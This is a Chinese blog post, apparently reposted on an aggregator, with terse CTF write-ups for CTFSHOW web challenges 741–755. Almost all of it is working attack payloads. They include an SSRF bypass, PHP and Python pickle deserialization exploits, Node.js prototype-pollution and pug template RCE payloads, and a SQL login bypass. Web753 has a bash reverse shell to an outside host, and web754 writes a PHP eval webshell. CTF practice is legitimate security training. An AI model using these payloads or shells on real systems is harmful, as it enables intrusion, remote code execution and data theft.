CTFSHOW大赛原题篇(web741-web755)

Posted yu22x

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFSHOW大赛原题篇(web741-web755)相关的知识,希望对你有一定的参考价值。

因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。

文章目录

web741

ssrf绕过
url=http://0.0.0.0:8080/flag

web742

web743

a[]=1&b[]=2&c[]=1&d[]=2

web744

<?php
class ctfshowCURL
  private $url="file:///var/www/html/flag%2ephp";
  private $method="send";


echo urlencode(serialize(new ctfshowCURL()));

web745

function=file_get_contents&param%5B%5D=/flag.txt

纯属蒙的

web746

wp
https://hi120ki.github.io/blog/posts/20210531/
得先登录成功 (admin/admin)
payload

"constructor/prototype/outputFunctionName": "a; return global.process.mainModule.constructor._load(\\"child_process\\").execSync(\\"./readflag\\"); //"

然后访问一下主页就可以了

web747

data=`ls ../`
data=`<../flag.txt`

web748

图片名字叫pickle.jpg,很明显是提示和python的反序列化有关。
随便输入一个值,查看cookie可以发现有内容,估计就是序列化的内容。那我们直接传一段恶意反序列化串就好了。(题目好好像是不能直接用os,所以我们通过__import__将其导入)

import pickle
from base64 import b64encode as b64
import requests
class exp(object):
        def __reduce__(self):
            cmd = 'cat /app/flag.txt'
            return __import__('os').popen, (cmd,)

e = exp()
s = pickle.dumps(e)
payload = b64(s).decode()

url = 'http://850a66a1-dbc9-413f-8068-9c2136d911e6.challenge.ctf.show/'
r = requests.get(url, cookies='contents': payload)
print(r.text)

web749

flat原型链污染+pug模板rce
当然这也是看了源码才知道的,怎么拿到的源码呢。。。
网上搜的。。。。
payload

//列目录
"song.name":"ASTa la vista baby",
     "__proto__.block": 
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('ls > static/js/main.js')"
    

//有个ctfshowxxxx文件
"song.name":"ASTa la vista baby",
     "__proto__.block": 
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('cat xxx > static/js/main.js')"
    

访问static/js/main.js拿到flag

web750

取反绕过就可以了

?formula=(~%8c%86%8c%8b%9a%92)(~%9c%9e%8b%df%d0%99%93%9e%98%d1%8b%87%8b)

web751

跟之前的web733差不多,只不过这个得先读下index.php,然后发现有个success.php flag就在里面。

<?php 

class access_log

	//public $log_file='index.php';
	public $log_file='success.php';


echo urlencode(base64_encode(serialize(new access_log())));

web752

具体源码看不到,尝试了很多万能密码,发现下面这种可行。
password=||'1&username=\\

web753

本地搭建了一下源码,发现大致的作用如下:
会通过传入url地址下载网页内容
运行内容中的代码(作为linux命令)
代码报错的内容会被写到文件中

这样的话我们其实是可以执行任意命令的。
本来想的是执行ls > index.html之类的命令,然后去访问首页得到运行结果,但是发现得重新启动环境才能生效。
因为没有回显所以最好的方法就是反弹shell了。

script_dir=1&script_name=1&script_url=http://xxx/shell.txt&command_log_file=1

vps上的内容为

bash -i >& /dev/tcp/xxx/4567 0>&1

web754

利用之前web686的无参数rce过的

POST:
cmd=system(pos(getallheaders()))

X-Forwarded-For:
echo '<?php eval($_POST[1]);?>' > /var/www/html/b.php;

蚁剑连上后运行/readflag
然后会在/tmp下生成一个flag,读取即可。

web755

源码
https://github.com/farazsth98/CTF/tree/master/zer0ptsctf/guestfs_afr/challenge

payload
https://github.com/farazsth98/CTF/blob/master/zer0ptsctf/guestfs_afr/exploit.py

放弃了。。。。

以上是关于CTFSHOW大赛原题篇(web741-web755)的主要内容,如果未能解决你的问题,请参考以下文章

CTFSHOW大赛原题篇(web711-web725)

CTFSHOW大赛原题篇(web726-web740)

CTFSHOW大赛原题篇(web756-web770)

CTFSHOW大赛原题篇(web696-web710)

ctfshow web入门 命令执行后篇(web55-web188)

《CTFshow-Web入门》08. Web 71~80